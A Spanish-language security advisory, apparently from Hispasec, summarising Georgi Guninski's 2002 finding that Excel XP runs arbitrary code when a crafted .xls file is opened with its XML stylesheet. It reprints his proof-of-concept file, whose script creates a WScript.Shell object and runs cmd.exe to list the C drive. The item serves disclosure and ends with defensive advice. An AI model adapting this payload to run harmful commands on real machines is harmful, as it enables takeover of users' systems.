Según Guninski, la hoja de cálculo de Microsoft para XP, se ve afectada por un problema debido a la incorporación de nuevas tecnologías como XML y XSLT. Desafortunadamente Excel ofrece un comportamiento incorrecto y se llegará a ejecutar código arbitrario si el usuario abre un archivo .xls y elige visualizarlo con la hoja de estilo xml.
Excel no da ningún aviso al usuario, tan solo pregunta cuando se desea emplear la hoja de estilo xml o no. De esta forma un archivo xls maliciosamente preparado podrá llegar a tomar el control del sistema.
Guninski ofrece la siguiente demostración del problema:
------xls_sux.xls-----
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="#?m$ux" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
<xsl:script>
<![CDATA[
x=new ActiveXObject("WScript.Shell");
x.Run("%systemroot%\\SYSTEM32\\CMD.EXE /C DIR C:\\ /a /p /s");
]]>
</xsl:script>
<msux>
msux
written by georgi guninski
</msux>
</xsl:stylesheet>
----------------------
Se recomienda no emplear la hoja de estilo xml en caso de que Excel pregunte por dicha acción.
Antonio Ropero
antonior@hispasec.com
antonior@hispasec.com
Más información:
Georgi Guninski security advisory #55, 2002:
Excel XP xml stylesheet problems:
http://www.guninski.com/ex$el2.html
